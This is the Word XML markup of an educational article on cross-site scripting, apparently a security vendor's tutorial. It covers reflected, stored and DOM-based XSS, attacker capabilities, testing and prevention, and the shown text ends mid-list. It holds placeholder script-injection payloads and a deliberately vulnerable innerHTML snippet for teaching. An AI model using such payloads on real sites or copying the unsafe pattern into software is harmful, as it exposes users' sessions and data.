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439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF6633"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF6633"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Cross-site scripting</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In this section, we'll explain what cross-site scripting is, describe the different varieties of cross-site scripting vulnerabilities, and spell out how to find and prevent cross-site scripting.</w:t>
      </w:r>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What is cross-site scripting (XSS)?</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How does XSS work?</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rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B46623D" wp14:editId="02157E6C">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="2" name="AutoShape 2" descr="Cross-site scrip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456CB" id="AutoShape 2" o:spid="_x0000_s1026" alt="Cross-site scrip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ghd&#10;GcICAADU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What are the types of XSS attacks?</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There are three main types of XSS attacks. These are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:anchor="reflected-cross-site-scripting" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Reflected XSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, where the malicious script comes from the current HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:anchor="stored-cross-site-scripting" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Stored XSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, where the malicious script comes from the website's database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:anchor="dom-based-cross-site-scripting" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>DOM-based XSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, where the vulnerability exists in client-side code rather than server-side code.</w:t>
      </w:r>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hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Reflected cross-site scripting</w:t>
        </w:r>
      </w:hyperlink>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hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Reflected XSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> is the simplest variety of cross-site scripting. It arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.</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Here is a simple example of a reflected XSS vulnerability:</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t>https://insecure-website.com/status?message=All+is+well.</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lastRenderedPageBreak/>
        <w:t>&lt;p&gt;Status: All is well.&lt;/p&gt;</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The application doesn't perform any other processing of the data, so an attacker can easily construct an attack like this:</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t>https://insecure-website.com/status?message=&lt;script&gt;/*+Bad+stuff+here...+*/&lt;/script&gt;</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t>&lt;p&gt;Status: &lt;script&gt;/* Bad stuff here... */&lt;/script&gt;&lt;/p&gt;</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If the user visits the URL constructed by the attacker, then the attacker's script executes in the user's browser, in the context of that user's session with the application. At that point, the script can carry out any action, and retrieve any data, to which the user has access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="center"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Read more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="333332"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Reflected cross-site scripting</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="333332"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Cross-site scripting contexts</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="333332"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Cross-site scripting cheat sheet</w:t>
        </w:r>
      </w:hyperlink>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hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Stored cross-site scripting</w:t>
        </w:r>
      </w:hyperlink>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hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Stored XSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> (also known as persistent or second-order XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.</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The data in question might be submitted to the application via HTTP requests; for example, comments on a blog post, user nicknames in a chat room, or contact details on a customer order. In other cases, the data might arrive from other untrusted sources; for example, a webmail application displaying messages received over SMTP, a marketing application displaying social media posts, or a network monitoring application displaying packet data from network traffic.</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Here is a simple example of a stored XSS vulnerability. A message board application lets users submit messages, which are displayed to other users:</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t>&lt;p&gt;Hello, this is my message!&lt;/p&gt;</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The application doesn't perform any other processing of the data, so an attacker can easily send a message that attacks other users:</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t>&lt;p&gt;&lt;script&gt;/* Bad stuff here... */&lt;/script&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="center"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Read more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="333332"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Stored cross-site scripting</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="333332"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Cross-site scripting contexts</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="333332"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Cross-site scripting cheat sheet</w:t>
        </w:r>
      </w:hyperlink>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DOM-based cross-site scripting</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DOM-based XSS (also known as </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>DOM XSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.</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In the following example, an application uses some JavaScript to read the value from an input field and write that value to an element within the HTML:</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t>var search = document.getElementById('search').value;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>var results = document.getElementById('results');</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>results.innerHTML = 'You searched for: ' + search;</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If the attacker can control the value of the input field, they can easily construct a malicious value that causes their own script to execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You searched for: &lt;img src=1 onerror='/* Bad stuff here... */'&gt;</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In a typical case, the input field would be populated from part of the HTTP request, such as a URL query string parameter, allowing the attacker to deliver an attack using a malicious URL, in the same manner as reflected XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="center"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Read more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="333332"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>DOM-based cross-site scripting</w:t>
        </w:r>
      </w:hyperlink>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What can XSS be used for?</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An attacker who exploits a cross-site scripting vulnerability is typically able to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Impersonate or masquerade as the victim user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Carry out any action that the user is able to perform.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Read any data that the user is able to access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Capture the user's login credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Perform virtual defacement of the web site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Inject trojan functionality into the web site.</w:t>
      </w:r>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Impact of XSS vulnerabilities</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The actual impact of an XSS attack generally depends on the nature of the application, its functionality and data, and the status of the compromised user. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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lastRenderedPageBreak/>
        <w:t>In a brochureware application, where all users are anonymous and all information is public, the impact will often be minimal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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In an application holding sensitive data, such as banking transactions, emails, or healthcare records, the impact will usually be serious.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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If the compromised user has elevated privileges within the application, then the impact will generally be critical, allowing the attacker to take full control of the vulnerable application and compromise all users and their data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="center"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Read more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="333332"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Exploiting cross-site scripting vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>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How to find and test for XSS vulnerabilities</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The vast majority of XSS vulnerabilities can be found quickly and reliably using Burp Suite's web vulnerability scanner.</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Manually testing for reflected and stored XSS normally involves submitting some simple unique input (such as a short alphanumeric string) into every entry point in the application; identifying every location where the submitted input is returned in HTTP responses; and testing each location individually to determine whether suitably crafted input can be used to execute arbitrary JavaScript.</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Manually testing for DOM-based XSS arising from URL parameters involves a similar process: placing some simple unique input in the parameter, using the browser's developer tools to search the DOM for this input, and testing each location to determine whether it is exploitable. However, other types of DOM XSS are harder to detect. To find DOM-based vulnerabilities in non-URL-based input (such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) or non-HTML-based sinks (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), there is no substitute for reviewing JavaScript code, which can be extremely time-consuming. Burp Suite's web vulnerability scanner combines static and dynamic analysis of JavaScript to reliably automate the detection of DOM-based vulnerabilities.</w:t>
      </w:r>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How to prevent XSS attacks</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Preventing cross-site scripting is trivial in some cases but can be much harder depending on the complexity of the application and the ways it handles user-controllable data.</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color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In general, effectively preventing XSS vulnerabilities is likely to involve a combination of the following measures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Filter input on arrival.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> At the point where user input is received, filter as strictly as possible based on what is expected or valid input.</w:t>
